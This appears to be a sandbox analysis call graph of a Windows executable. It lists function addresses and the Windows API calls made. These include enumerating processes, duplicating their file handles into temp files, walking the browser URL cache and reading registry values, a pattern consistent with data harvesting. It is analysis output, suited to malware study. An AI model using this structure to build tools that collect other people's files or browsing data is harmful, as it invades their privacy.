402d78 38906->38907 38908 40b2cc 27 API calls 38907->38908 38909 402d93 38908->38909 38910 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38909->38910 38910->38793 38911->38783 38915 40b58d 38912->38915 38914 40b2d1 38914->38857 38916 40b5a4 GetModuleHandleW FindResourceW 38915->38916 38917 40b62e 38915->38917 38918 40b5c2 LoadResource 38916->38918 38920 40b5e7 38916->38920 38917->38914 38919 40b5d0 SizeofResource LockResource 38918->38919 38918->38920 38919->38920 38920->38917 38928 40afcf 38920->38928 38922 40b608 memcpy 38931 40b4d3 memcpy 38922->38931 38924 40b61e 38932 40b3c1 18 API calls 38924->38932 38926 40b626 38933 40b04b 38926->38933 38929 40b04b ??3@YAXPAX 38928->38929 38930 40afd7 ??2@YAPAXI 38929->38930 38930->38922 38931->38924 38932->38926 38934 40b051 ??3@YAXPAX 38933->38934 38935 40b05f 38933->38935 38934->38935 38935->38917 38936->38801 38938 4032c4 38937->38938 38939 40b633 ??3@YAXPAX 38938->38939 38940 403316 38939->38940 38959 44553b 38940->38959 38944 403480 39155 40368c 15 API calls 38944->39155 38946 403489 38947 40b633 ??3@YAXPAX 38946->38947 38948 403495 38947->38948 38948->38803 38949 4033a9 memset memcpy 38950 4033ec wcscmp 38949->38950 38951 40333c 38949->38951 38950->38951 38951->38944 38951->38949 38951->38950 39153 4028e7 11 API calls 38951->39153 39154 40f508 6 API calls 38951->39154 38954 403421 _wcsicmp 38954->38951 38956 444a64 FreeLibrary 38955->38956 38957 444a83 38955->38957 38956->38957 38957->38803 38958->38804 38960 445548 38959->38960 38961 445599 38960->38961 39156 40c768 38960->39156 38962 4455a8 memset 38961->38962 38970 4457f2 38961->38970 39239 403988 38962->39239 38968 4455e5 38983 445672 38968->38983 38988 44560f 38968->38988 38973 445854 38970->38973 39341 403e2d memset memset memset memset memset 38970->39341 38971 4458bb memset memset 38975 414c2e 15 API calls 38971->38975 39016 4458aa 38973->39016 39364 403c9c memset memset memset memset memset 38973->39364 38974 44595e memset memset 38978 414c2e 15 API calls 38974->38978 38979 4458f9 38975->38979 38977 445a00 memset memset 39387 414c2e 38977->39387 38986 44599c 38978->38986 38987 40b2cc 27 API calls 38979->38987 39250 403fbe memset memset memset memset memset 38983->39250 38995 40b2cc 27 API calls 38986->38995 38996 445909 38987->38996 38998 4087b3 337 API calls 38988->38998 38989 445bca 38997 445c8b memset memset 38989->38997 39052 445cf0 38989->39052 38990 445b38 memset memset memset 39000 445bd4 38990->39000 39001 445b98 38990->39001 38991 445849 39451 40b1ab ??3@YAXPAX ??3@YAXPAX 38991->39451 39010 4459ac 38995->39010 39007 409d1f 6 API calls 38996->39007 39011 414c2e 15 API calls 38997->39011 39008 445621 38998->39008 38999 44589f 39452 40b1ab ??3@YAXPAX ??3@YAXPAX 38999->39452 39005 414c2e 15 API calls 39000->39005 39001->39000 39013 445ba2 39001->39013 39003 40b2cc 27 API calls 39015 445a4f 39003->39015 39018 445be2 39005->39018 39006 403335 39152 4452e5 45 API calls 39006->39152 39021 445919 39007->39021 39437 4454bf 20 API calls 39008->39437 39009 445823 39009->38991 39030 4087b3 337 API calls 39009->39030 39022 409d1f 6 API calls 39010->39022 39023 445cc9 39011->39023 39522 4099c6 wcslen 39013->39522 39402 409d1f wcslen wcslen 39015->39402 39016->38971 39049 44594a 39016->39049 39028 40b2cc 27 API calls 39018->39028 39019 445d3d 39048 40b2cc 27 API calls 39019->39048 39020 445d88 memset memset memset 39031 414c2e 15 API calls 39020->39031 39453 409b98 GetFileAttributesW 39021->39453 39032 4459bc 39022->39032 39033 409d1f 6 API calls 39023->39033 39024 445879 39024->38999 39035 4087b3 337 API calls 39024->39035 39025 445bb3 39525 445403 memset 39025->39525 39038 445bf3 39028->39038 39030->39009 39041 445dde 39031->39041 39518 409b98 GetFileAttributesW 39032->39518 39034 445ce1 39033->39034 39542 409b98 GetFileAttributesW 39034->39542 39035->39024 39047 409d1f 6 API calls 39038->39047 39039 445928 39039->39049 39454 40b6ef 39039->39454 39050 40b2cc 27 API calls 39041->39050 39046 40b2cc 27 API calls 39054 445a94 39046->39054 39056 445c07 39047->39056 39057 445d54 _wcsicmp 39048->39057 39049->38974 39061 4459ed 39049->39061 39060 445def 39050->39060 39051 4459cb 39051->39061 39068 40b6ef 249 API calls 39051->39068 39052->39006 39052->39019 39052->39020 39053 445389 255 API calls 39053->38989 39407 40ae18 39054->39407 39055 44566d 39055->38970 39324 413d4c 39055->39324 39064 445389 255 API calls 39056->39064 39065 445d71 39057->39065 39129 445d67 39057->39129 39059 445665 39438 40b1ab ??3@YAXPAX ??3@YAXPAX 39059->39438 39066 409d1f 6 API calls 39060->39066 39061->38977 39103 445b22 39061->39103 39070 445c17 39064->39070 39543 445093 23 API calls 39065->39543 39073 445e03 39066->39073 39068->39061 39069 4456d8 39075 40b2cc 27 API calls 39069->39075 39076 40b2cc 27 API calls 39070->39076 39072 44563c 39072->39059 39078 4087b3 337 API calls 39072->39078 39544 409b98 GetFileAttributesW 39073->39544 39074 40b6ef 249 API calls 39074->39006 39080 4456e2 39075->39080 39081 445c23 39076->39081 39077 445d83 39077->39006 39078->39072 39440 413fa6 _wcsicmp _wcsicmp 39080->39440 39085 409d1f 6 API calls 39081->39085 39083 445e12 39090 445e6b 39083->39090 39097 40b2cc 27 API calls 39083->39097 39088 445c37 39085->39088 39086 445aa1 39089 445b17 39086->39089 39106 445ab2 memset 39086->39106 39120 409d1f 6 API calls 39086->39120 39414 40add4 39086->39414 39419 445389 39086->39419 39428 40ae51 39086->39428 39087 4456eb 39093 4456fd memset memset memset memset 39087->39093 39094 4457ea 39087->39094 39095 445389 255 API calls 39088->39095 39519 40aebe 39089->39519 39546 445093 23 API calls 39090->39546 39441 409c70 wcscpy wcsrchr 39093->39441 39444 413d29 39094->39444 39102 445c47 39095->39102 39098 445e33 39097->39098 39104 409d1f 6 API calls 39098->39104 39100 445e7e 39105 445f67 39100->39105 39108 40b2cc 27 API calls 39102->39108 39103->38989 39103->38990 39109 445e47 39104->39109 39110 40b2cc 27 API calls 39105->39110 39111 40b2cc 27 API calls 39106->39111 39113 445c53 39108->39113 39545 409b98 GetFileAttributesW 39109->39545 39115 445f73 39110->39115 39111->39086 39112 409c70 2 API calls 39116 44577e 39112->39116 39117 409d1f 6 API calls 39113->39117 39119 409d1f 6 API calls 39115->39119 39121 409c70 2 API calls 39116->39121 39122 445c67 39117->39122 39118 445e56 39118->39090 39126 445e83 memset 39118->39126 39123 445f87 39119->39123 39120->39086 39125 445389 255 API calls 39122->39125 39549 409b98 GetFileAttributesW 39123->39549 39125->38989 39130 40b2cc 27 API calls 39126->39130 39129->39006 39129->39074 39132 445eab 39130->39132 39134 409d1f 6 API calls 39132->39134 39136 445ebf 39134->39136 39138 40ae18 9 API calls 39136->39138 39148 445ef5 39138->39148 39142 40ae51 9 API calls 39142->39148 39143 445f5c 39144 40aebe FindClose 39143->39144 39144->39105 39145 40add4 2 API calls 39145->39148 39146 40b2cc 27 API calls 39146->39148 39147 409d1f 6 API calls 39147->39148 39148->39142 39148->39143 39148->39145 39148->39146 39148->39147 39150 445f3a 39148->39150 39547 409b98 GetFileAttributesW 39148->39547 39548 445093 23 API calls 39150->39548 39152->38951 39153->38954 39154->38951 39155->38946 39157 40c775 39156->39157 39550 40b1ab ??3@YAXPAX ??3@YAXPAX 39157->39550 39159 40c788 39551 40b1ab ??3@YAXPAX ??3@YAXPAX 39159->39551 39161 40c790 39552 40b1ab ??3@YAXPAX ??3@YAXPAX 39161->39552 39163 40c798 39164 40aa04 ??3@YAXPAX 39163->39164 39165 40c7a0 39164->39165 39553 40c274 memset 39165->39553 39170 40a8ab 9 API calls 39171 40c7c3 39170->39171 39172 40a8ab 9 API calls 39171->39172 39173 40c7d0 39172->39173 39582 40c3c3 39173->39582 39177 40c7e5 39178 40c877 39177->39178 39179 40c86c 39177->39179 39185 40c634 49 API calls 39177->39185 39607 40a706 39177->39607 39186 40bdb0 39178->39186 39624 4053fe 39 API calls 39179->39624 39185->39177 39814 404363 39186->39814 39240 40399d 39239->39240 39880 403a16 39240->39880 39242 403a09 39894 40b1ab ??3@YAXPAX ??3@YAXPAX 39242->39894 39244 403a12 wcsrchr 39244->38968 39245 4039a3 39245->39242 39248 4039f4 39245->39248 39891 40a02c CreateFileW 39245->39891 39248->39242 39249 4099c6 2 API calls 39248->39249 39249->39242 39251 414c2e 15 API calls 39250->39251 39252 404048 39251->39252 39253 414c2e 15 API calls 39252->39253 39254 404056 39253->39254 39255 409d1f 6 API calls 39254->39255 39256 404073 39255->39256 39257 409d1f 6 API calls 39256->39257 39258 40408e 39257->39258 39259 409d1f 6 API calls 39258->39259 39260 4040a6 39259->39260 39261 403af5 20 API calls 39260->39261 39262 4040ba 39261->39262 39263 403af5 20 API calls 39262->39263 39264 4040cb 39263->39264 39921 40414f memset 39264->39921 39266 4040e0 39267 404140 39266->39267 39269 4040ec memset 39266->39269 39271 4099c6 2 API calls 39266->39271 39272 40a8ab 9 API calls 39266->39272 39935 40b1ab ??3@YAXPAX ??3@YAXPAX 39267->39935 39269->39266 39271->39266 39272->39266 39325 40b633 ??3@YAXPAX 39324->39325 39326 413d65 CreateToolhelp32Snapshot memset Process32FirstW 39325->39326 39327 413f00 Process32NextW 39326->39327 39328 413da5 OpenProcess 39327->39328 39329 413f17 CloseHandle 39327->39329 39330 413df3 memset 39328->39330 39333 413eb0 39328->39333 39329->39069 40187 413f27 39330->40187 39332 413ebf ??3@YAXPAX 39332->39333 39333->39327 39333->39332 39334 4099f4 3 API calls 39333->39334 39334->39333 39335 413e37 GetModuleHandleW 39337 413e46 GetProcAddress 39335->39337 39338 413e1f 39335->39338 39337->39338 39338->39335 40192 413959 39338->40192 40208 413ca4 39338->40208 39340 413ea2 CloseHandle 39340->39333 39342 414c2e 15 API calls 39341->39342 39343 403eb7 39342->39343 39344 414c2e 15 API calls 39343->39344 39345 403ec5 39344->39345 39346 409d1f 6 API calls 39345->39346 39347 403ee2 39346->39347 39348 409d1f 6 API calls 39347->39348 39349 403efd 39348->39349 39350 409d1f 6 API calls 39349->39350 39351 403f15 39350->39351 39352 403af5 20 API calls 39351->39352 39353 403f29 39352->39353 39354 403af5 20 API calls 39353->39354 39355 403f3a 39354->39355 39356 40414f 33 API calls 39355->39356 39357 403f4f 39356->39357 39358 403faf 39357->39358 39360 403f5b memset 39357->39360 39362 4099c6 2 API calls 39357->39362 39363 40a8ab 9 API calls 39357->39363 40222 40b1ab ??3@YAXPAX ??3@YAXPAX 39358->40222 39360->39357 39361 403fb7 39361->39009 39362->39357 39363->39357 39365 414c2e 15 API calls 39364->39365 39366 403d26 39365->39366 39367 414c2e 15 API calls 39366->39367 39368 403d34 39367->39368 39369 409d1f 6 API calls 39368->39369 39370 403d51 39369->39370 39371 409d1f 6 API calls 39370->39371 39372 403d6c 39371->39372 39373 409d1f 6 API calls 39372->39373 39374 403d84 39373->39374 39375 403af5 20 API calls 39374->39375 39376 403d98 39375->39376 39377 403af5 20 API calls 39376->39377 39378 403da9 39377->39378 39379 40414f 33 API calls 39378->39379 39385 403dbe 39379->39385 39380 403e1e 40223 40b1ab ??3@YAXPAX ??3@YAXPAX 39380->40223 39381 403dca memset 39381->39385 39383 403e26 39383->39024 39384 4099c6 2 API calls 39384->39385 39385->39380 39385->39381 39385->39384 39386 40a8ab 9 API calls 39385->39386 39386->39385 39388 414b81 9 API calls 39387->39388 39389 414c40 39388->39389 39390 414c73 memset 39389->39390 40224 409cea 39389->40224 39391 414c94 39390->39391 40227 414592 RegOpenKeyExW 39391->40227 39394 414c64 39394->39003 39396 414cc1 39397 414cf4 wcscpy 39396->39397 40228 414bb0 wcscpy 39396->40228 39397->39394 39399 414cd2 40229 4145ac RegQueryValueExW 39399->40229 39401 414ce9 39401->39397 39403 409d62 39402->39403 39404 409d43 wcscpy 39402->39404 39403->39046 39405 409719 2 API calls 39404->39405 39406 409d51 wcscat 39405->39406 39406->39403 39408 40aebe FindClose 39407->39408 39409 40ae21 39408->39409 39410 4099c6 2 API calls 39409->39410 39411 40ae35 39410->39411 39412 409d1f 6 API calls 39411->39412 39413 40ae49 39412->39413 39413->39086 39415 40ade0 39414->39415 39416 40ae0f 39414->39416 39415->39416 39417 40ade7 wcscmp 39415->39417 39416->39086 39417->39416 39418 40adfe wcscmp 39417->39418 39418->39416 39420 40ae18 9 API calls 39419->39420 39422 4453c4 39420->39422 39421 40ae51 9 API calls 39421->39422 39422->39421 39423 4453f3 39422->39423 39424 40add4 2 API calls 39422->39424 39427 445403 250 API calls 39422->39427 39425 40aebe FindClose 39423->39425 39424->39422 39426 4453fe 39425->39426 39426->39086 39427->39422 39429 40ae7b FindNextFileW 39428->39429 39430 40ae5c FindFirstFileW 39428->39430 39431 40ae94 39429->39431 39432 40ae8f 39429->39432 39430->39431 39434 40aeb6 39431->39434 39435 409d1f 6 API calls 39431->39435 39433 40aebe FindClose 39432->39433 39433->39431 39434->39086 39435->39434 39437->39072 39438->39055 39440->39087 39442 409c89 39441->39442 39442->39112 39445 413d39 39444->39445 39446 413d2f FreeLibrary 39444->39446 39447 40b633 ??3@YAXPAX 39445->39447 39446->39445 39448 413d42 39447->39448 39449 40b633 ??3@YAXPAX 39448->39449 39451->38973 39452->39016 39453->39039 39455 44db70 39454->39455 39456 40b6fc memset 39455->39456 39457 409c70 2 API calls 39456->39457 39458 40b732 wcsrchr 39457->39458 39459 40b743 39458->39459 39460 40b746 memset 39458->39460 39459->39460 39461 40b2cc 27 API calls 39460->39461 39462 40b76f 39461->39462 39463 409d1f 6 API calls 39462->39463 39464 40b783 39463->39464 40230 409b98 GetFileAttributesW 39464->40230 39466 40b792 39467 40b7c2 39466->39467 39469 409c70 2 API calls 39466->39469 40231 40bb98 39467->40231 39471 40b7a5 39469->39471 39474 40b2cc 27 API calls 39471->39474 39472 40b837 FindCloseChangeNotification 39477 40b83e memset 39472->39477 39473 40b817 40265 409a45 GetTempPathW 39473->40265 39475 40b7b2 39474->39475 39478 409d1f 6 API calls 39475->39478 40264 40a6e6 WideCharToMultiByte 39477->40264 39478->39467 39479 40b827 39479->39477 39481 40b866 39482 444432 120 API calls 39481->39482 39483 40b879 39482->39483 39484 40b273 27 API calls 39483->39484 39485 40bad5 39483->39485 39486 40b89a 39484->39486 39487 40b04b ??3@YAXPAX 39485->39487 39488 438552 133 API calls 39486->39488 39489 40baf3 39487->39489 39490 40b8a4 39488->39490 39489->39049 39491 40bacd 39490->39491 39493 4251c4 136 API calls 39490->39493 39492 443d90 110 API calls 39491->39492 39492->39485 39516 40b8b8 39493->39516 39494 40bac6 40277 424f26 122 API calls 39494->40277 39495 40b8bd memset 40268 425413 17 API calls 39495->40268 39498 425413 17 API calls 39498->39516 39501 40a71b MultiByteToWideChar 39501->39516 39502 40a734 MultiByteToWideChar 39502->39516 39505 40b9b5 memcmp 39505->39516 39506 4099c6 2 API calls 39506->39516 39507 404423 37 API calls 39507->39516 39510 4251c4 136 API calls 39510->39516 39511 40bb3e memset memcpy 40278 40a734 MultiByteToWideChar 39511->40278 39513 40bb88 LocalFree 39513->39516 39516->39494 39516->39495 39516->39498 39516->39501 39516->39502 39516->39505 39516->39506 39516->39507 39516->39510 39516->39511 39517 40ba5f memcmp 39516->39517 40269 4253ef 16 API calls 39516->40269 40270 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 39516->40270 40271 4253af 17 API calls 39516->40271 40272 4253cf 17 API calls 39516->40272 40273 447280 memset 39516->40273 40274 447960 memset memcpy memcpy memcpy 39516->40274 40275 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 39516->40275 40276 447920 memcpy memcpy memcpy 39516->40276 39517->39516 39518->39051 39520 40aed1 39519->39520 39521 40aec7 FindClose 39519->39521 39520->39103 39521->39520 39523 4099d7 39522->39523 39524 4099da memcpy 39522->39524 39523->39524 39524->39025 39526 40b2cc 27 API calls 39525->39526 39527 44543f 39526->39527 39528 409d1f 6 API calls 39527->39528 39529 44544f 39528->39529 40370 409b98 GetFileAttributesW 39529->40370 39531 44545e 39532 445476 39531->39532 39534 40b6ef 249 API calls 39531->39534 39533 40b2cc 27 API calls 39532->39533 39535 445482 39533->39535 39534->39532 39536 409d1f 6 API calls 39535->39536 39537 445492 39536->39537 40371 409b98 GetFileAttributesW 39537->40371 39539 4454a1 39540 4454b9 39539->39540 39541 40b6ef 249 API calls 39539->39541 39540->39053 39541->39540 39542->39052 39543->39077 39544->39083 39545->39118 39546->39100 39547->39148 39548->39148 39549->39129 39550->39159 39551->39161 39552->39163 39554 414c2e 15 API calls 39553->39554 39555 40c2ae 39554->39555 39625 40c1d3 39555->39625 39560 40c3be 39577 40a8ab 39560->39577 39561 40afcf 2 API calls 39562 40c2fd FindFirstUrlCacheEntryW 39561->39562 39563 40c3b6 39562->39563 39564 40c31e wcschr 39562->39564 39565 40b04b ??3@YAXPAX 39563->39565 39566 40c331 39564->39566 39567 40c35e FindNextUrlCacheEntryW 39564->39567 39565->39560 39569 40a8ab 9 API calls 39566->39569 39567->39564 39568 40c373 GetLastError 39567->39568 39570 40c3ad FindCloseUrlCache 39568->39570 39571 40c37e 39568->39571 39572 40c33e wcschr 39569->39572 39570->39563 39573 40afcf 2 API calls 39571->39573 39572->39567 39574 40c34f 39572->39574 39575 40c391 FindNextUrlCacheEntryW 39573->39575 39576 40a8ab 9 API calls 39574->39576 39575->39564 39575->39570 39576->39567 39741 40a97a 39577->39741 39580 40a8cc 39580->39170 39581 40a8d0 7 API calls 39581->39580 39746 40b1ab ??3@YAXPAX ??3@YAXPAX 39582->39746 39584 40c3dd 39585 40b2cc 27 API calls 39584->39585 39586 40c3e7 39585->39586 39747 414592 RegOpenKeyExW 39586->39747 39588 40c3f4 39589 40c50e 39588->39589 39590 40c3ff 39588->39590 39604 405337 39589->39604 39591 40a9ce 4 API calls 39590->39591 39592 40c418 memset 39591->39592 39748 40aa1d 39592->39748 39595 40c471 39597 40c47a _wcsupr 39595->39597 39596 40c505 39596->39589 39598 40a8d0 7 API calls 39597->39598 39599 40c498 39598->39599 39600 40a8d0 7 API calls 39599->39600 39750 405220 39604->39750 39608 4099c6 2 API calls 39607->39608 39609 40a714 _wcslwr 39608->39609 39610 40c634 39609->39610 39807 405361 39610->39807 39624->39178 39626 40ae18 9 API calls 39625->39626 39632 40c210 39626->39632 39627 40ae51 9 API calls 39627->39632 39628 40c264 39629 40aebe FindClose 39628->39629 39631 40c26f 39629->39631 39630 40add4 2 API calls 39630->39632 39637 40e5ed memset memset 39631->39637 39632->39627 39632->39628 39632->39630 39633 40c231 _wcsicmp 39632->39633 39634 40c1d3 34 API calls 39632->39634 39633->39632 39635 40c248 39633->39635 39634->39632 39650 40c084 21 API calls 39635->39650 39638 414c2e 15 API calls 39637->39638 39639 40e63f 39638->39639 39640 409d1f 6 API calls 39639->39640 39641 40e658 39640->39641 39651 409b98 GetFileAttributesW 39641->39651 39643 40e667 39644 409d1f 6 API calls 39643->39644 39646 40e680 39643->39646 39644->39646 39652 409b98 GetFileAttributesW 39646->39652 39647 40e68f 39648 40c2d8 39647->39648 39653 40e4b2 39647->39653 39648->39560 39648->39561 39650->39632 39651->39643 39652->39647 39674 40e01e 39653->39674 39655 40e593 39656 40e5b0 39655->39656 39657 40e59c DeleteFileW 39655->39657 39658 40b04b ??3@YAXPAX 39656->39658 39657->39656 39660 40e5bb 39658->39660 39659 40e521 39659->39655 39697 40e175 39659->39697 39662 40e5c4 CloseHandle 39660->39662 39663 40e5cc 39660->39663 39662->39663 39664 40b633 ??3@YAXPAX 39663->39664 39666 40e5db 39664->39666 39665 40e573 39667 40e584 39665->39667 39668 40e57c FindCloseChangeNotification 39665->39668 39670 40b633 ??3@YAXPAX 39666->39670 39740 40b1ab ??3@YAXPAX ??3@YAXPAX 39667->39740 39668->39667 39669 40e540 39669->39665 39717 40e2ab 39669->39717 39672 40e5e3 39670->39672 39672->39648 39675 406214 22 API calls 39674->39675 39676 40e03c 39675->39676 39677 40e16b 39676->39677 39678 40dd85 74 API calls 39676->39678 39677->39659 39679 40e06b 39678->39679 39679->39677 39680 40afcf ??2@YAPAXI ??3@YAXPAX 39679->39680 39681 40e08d OpenProcess 39680->39681 39682 40e0a4 GetCurrentProcess DuplicateHandle 39681->39682 39686 40e152 39681->39686 39683 40e0d0 GetFileSize 39682->39683 39684 40e14a CloseHandle 39682->39684 39687 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39683->39687 39684->39686 39685 40e160 39689 40b04b ??3@YAXPAX 39685->39689 39686->39685 39688 406214 22 API calls 39686->39688 39690 40e0ea 39687->39690 39688->39685 39689->39677 39691 4096dc CreateFileW 39690->39691 39692 40e0f1 CreateFileMappingW 39691->39692 39693 40e140 CloseHandle CloseHandle 39692->39693 39694 40e10b MapViewOfFile 39692->39694 39693->39684 39695 40e13b FindCloseChangeNotification 39694->39695 39696 40e11f WriteFile UnmapViewOfFile 39694->39696 39695->39693 39696->39695 39698 40e18c 39697->39698 39699 406b90 11 API calls 39698->39699 39700 40e19f 39699->39700 39701 40e1a7 memset 39700->39701 39702 40e299 39700->39702 39707 40e1e8 39701->39707 39703 4069a3 ??3@YAXPAX ??3@YAXPAX 39702->39703 39704 40e2a4 39703->39704 39704->39669 39705 406e8f 13 API calls 39705->39707 39706 406b53 SetFilePointerEx ReadFile 39706->39707 39707->39705 39707->39706 39708 40dd50 _wcsicmp 39707->39708 39709 40e283 39707->39709 39713 40742e 8 API calls 39707->39713 39714 40aae3 wcslen wcslen _memicmp 39707->39714 39715 40e244 _snwprintf 39707->39715 39708->39707 39710 40e291 39709->39710 39711 40e288 ??3@YAXPAX 39709->39711 39712 40aa04 ??3@YAXPAX 39710->39712 39711->39710 39712->39702 39713->39707 39714->39707 39716 40a8d0 7 API calls 39715->39716 39716->39707 39718 40e2c2 39717->39718 39719 406b90 11 API calls 39718->39719 39730 40e2d3 39719->39730 39720 40e4a0 39721 4069a3 ??3@YAXPAX ??3@YAXPAX 39720->39721 39723 40e4ab 39721->39723 39722 406e8f 13 API calls 39722->39730 39723->39669 39724 406b53 SetFilePointerEx ReadFile 39724->39730 39725 40e489 39726 40aa04 ??3@YAXPAX 39725->39726 39727 40e491 39726->39727 39727->39720 39729 40e497 ??3@YAXPAX 39727->39729 39728 40dd50 _wcsicmp 39728->39730 39729->39720 39730->39720 39730->39722 39730->39724 39730->39725 39730->39728 39731 40dd50 _wcsicmp 39730->39731 39734 40742e 8 API calls 39730->39734 39735 40e3e0 memcpy 39730->39735 39736 40e3fb memcpy 39730->39736 39737 40e3b3 wcschr 39730->39737 39738 40e416 memcpy 39730->39738 39739 40e431 memcpy 39730->39739 39732 40e376 memset 39731->39732 39733 40aa29 6 API calls 39732->39733 39733->39730 39734->39730 39735->39730 39736->39730 39737->39730 39738->39730 39739->39730 39740->39655 39742 40a980 39741->39742 39743 40a995 _wcsicmp 39742->39743 39744 40a99c wcscmp 39742->39744 39745 40a8bb 39742->39745 39743->39742 39744->39742 39745->39580 39745->39581 39746->39584 39747->39588 39749 40aa23 RegEnumValueW 39748->39749 39749->39595 39749->39596 39751 405335 39750->39751 39752 40522a 39750->39752 39751->39177 39753 40b2cc 27 API calls 39752->39753 39754 405234 39753->39754 39755 40a804 8 API calls 39754->39755 39756 40523a 39755->39756 39795 40b273 39756->39795 39796 40b58d 27 API calls 39795->39796 39815 40440c FreeLibrary 39814->39815 39816 40436d 39815->39816 39881 403a29 39880->39881 39895 403bed memset memset 39881->39895 39883 403ae7 39908 40b1ab ??3@YAXPAX ??3@YAXPAX 39883->39908 39884 403a3f memset 39888 403a2f 39884->39888 39886 403aef 39886->39245 39887 409d1f 6 API calls 39887->39888 39888->39883 39888->39884 39888->39887 39889 409b98 GetFileAttributesW 39888->39889 39890 40a8d0 7 API calls 39888->39890 39889->39888 39890->39888 39892 40a051 GetFileTime FindCloseChangeNotification 39891->39892 39893 4039ca CompareFileTime 39891->39893 39892->39893 39893->39245 39894->39244 39896 414c2e 15 API calls 39895->39896 39897 403c38 39896->39897 39898 409719 2 API calls 39897->39898 39899 403c3f wcscat 39898->39899 39900 414c2e 15 API calls 39899->39900 39901 403c61 39900->39901 39902 409719 2 API calls 39901->39902 39903 403c68 wcscat 39902->39903 39909 403af5 39903->39909 39906 403af5 20 API calls 39907 403c95 39906->39907 39907->39888 39908->39886 39910 403b02 39909->39910 39911 40ae18 9 API calls 39910->39911 39920 403b37 39911->39920 39912 403bdb 39914 40aebe FindClose 39912->39914 39913 40add4 wcscmp wcscmp 39913->39920 39915 403be6 39914->39915 39915->39906 39916 40a8d0 7 API calls 39916->39920 39917 40ae18 9 API calls 39917->39920 39918 40ae51 9 API calls 39918->39920 39919 40aebe FindClose 39919->39920 39920->39912 39920->39913 39920->39916 39920->39917 39920->39918 39920->39919 39922 409d1f 6 API calls 39921->39922 39923 404190 39922->39923 39936 409b98 GetFileAttributesW 39923->39936 39925 40419c 39926 4041a7 6 API calls 39925->39926 39927 40435c 39925->39927 39928 40424f 39926->39928 39927->39266 39928->39927 39930 40425e memset 39928->39930 39932 409d1f 6 API calls 39928->39932 39933 40a8ab 9 API calls 39928->39933 39937 414842 39928->39937 39930->39928 39932->39928 39936->39925 39940 41443e 39937->39940 40214 413f4f 40187->40214 40190 413f37 K32GetModuleFileNameExW 40191 413f4a 40190->40191 40191->39338 40193 41396c wcschr 40192->40193 40195 413969 wcscpy 40192->40195 40193->40195 40196 41398e 40193->40196 40197 413a3a 40195->40197 40219 4097f7 wcslen wcslen _memicmp 40196->40219 40197->39338 40199 41399a 40209 413cb0 GetModuleHandleW 40208->40209 40210 413cda 40208->40210 40209->40210 40211 413cbf GetProcAddress 40209->40211 40212 413ce3 GetProcessTimes 40210->40212 40213 413cf6 40210->40213 40211->40210 40212->39340 40213->39340 40215 413f2f 40214->40215 40216 413f54 40214->40216 40215->40190 40215->40191 40217 40a804 8 API calls 40216->40217 40218 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 40217->40218 40218->40215 40219->40199 40222->39361 40223->39383 40225 409cf9 GetVersionExW 40224->40225 40226 409d0a 40224->40226 40225->40226 40226->39390 40226->39394 40227->39396 40228->39399 40229->39401 40230->39466 40232 40bba5 40231->40232 40279 40cc26 40232->40279 40235 40bd4b 40300 40cc0c 40235->40300 40240 40b2cc 27 API calls 40241 40bbef 40240->40241 40307 40ccf0 _wcsicmp 40241->40307 40243 40bbf5 40243->40235 40308 40ccb4 6 API calls 40243->40308 40245 40bc26 40246 40cf04 17 API calls 40245->40246 40247 40bc2e 40246->40247 40248 40bd43 40247->40248 40249 40b2cc 27 API calls 40247->40249 40250 40cc0c 4 API calls 40248->40250 40251 40bc40 40249->40251 40250->40235 40309 40ccf0 _wcsicmp 40251->40309 40253 40bc46 40253->40248 40254 40bc61 memset memset WideCharToMultiByte 40253->40254 40310 40103c strlen 40254->40310 40256 40bcc0 40257 40b273 27 API calls 40256->40257 40258 40bcd0 memcmp 40257->40258 40258->40248 40259 40bce2 40258->40259 40260 404423 37 API calls 40259->40260 40261 40bd10 40260->40261 40261->40248 40264->39481 40266 409a74 GetTempFileNameW 40265->40266 40267 409a66 GetWindowsDirectoryW 40265->40267 40266->39479 40267->40266 40268->39516 40269->39516 40270->39516 40271->39516 40272->39516 40273->39516 40274->39516 40275->39516 40276->39516 40277->39491 40278->39513 40311 4096c3 CreateFileW 40279->40311 40281 40cc34 40282 40cc3d GetFileSize 40281->40282 40283 40bbca 40281->40283 40284 40afcf 2 API calls 40282->40284 40283->40235 40291 40cf04 40283->40291 40285 40cc64 40284->40285 40312 40a2ef ReadFile 40285->40312 40287 40cc71 40313 40ab4a MultiByteToWideChar 40287->40313 40289 40cc95 FindCloseChangeNotification 40290 40b04b ??3@YAXPAX 40289->40290 40290->40283 40292 40b633 ??3@YAXPAX 40291->40292 40293 40cf14 40292->40293 40319 40b1ab ??3@YAXPAX ??3@YAXPAX 40293->40319 40295 40bbdd 40295->40235 40295->40240 40296 40cf1b 40296->40295 40298 40cfef 40296->40298 40320 40cd4b 40296->40320 40299 40cd4b 14 API calls 40298->40299 40299->40295 40301 40b633 ??3@YAXPAX 40300->40301 40302 40cc15 40301->40302 40303 40aa04 ??3@YAXPAX 40302->40303 40304 40cc1d 40303->40304 40369 40b1ab ??3@YAXPAX ??3@YAXPAX 40304->40369 40306 40b7d4 memset CreateFileW 40306->39472 40306->39473 40307->40243 40308->40245 40309->40253 40310->40256 40311->40281 40312->40287 40314 40ab6b 40313->40314 40318 40ab93 40313->40318 40315 40a9ce 4 API calls 40314->40315 40316 40ab74 40315->40316 40317 40ab7c MultiByteToWideChar 40316->40317 40317->40318 40318->40289 40319->40296 40321 40cd7b 40320->40321 40354 40aa29 40321->40354 40323 40cef5 40324 40aa04 ??3@YAXPAX 40323->40324 40325 40cefd 40324->40325 40325->40296 40327 40aa29 6 API calls 40328 40ce1d 40327->40328 40329 40aa29 6 API calls 40328->40329 40330 40ce3e 40329->40330 40331 40ce6a 40330->40331 40362 40abb7 wcslen memmove 40330->40362 40332 40ce9f 40331->40332 40365 40abb7 wcslen memmove 40331->40365 40335 40a8d0 7 API calls 40332->40335 40338 40ceb5 40335->40338 40336 40ce56 40363 40aa71 wcslen 40336->40363 40337 40ce8b 40366 40aa71 wcslen 40337->40366 40344 40a8d0 7 API calls 40338->40344 40341 40ce5e 40364 40abb7 wcslen memmove 40341->40364 40342 40ce93 40367 40abb7 wcslen memmove 40342->40367 40346 40cecb 40344->40346 40368 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 40346->40368 40348 40cedd 40349 40aa04 ??3@YAXPAX 40348->40349 40350 40cee5 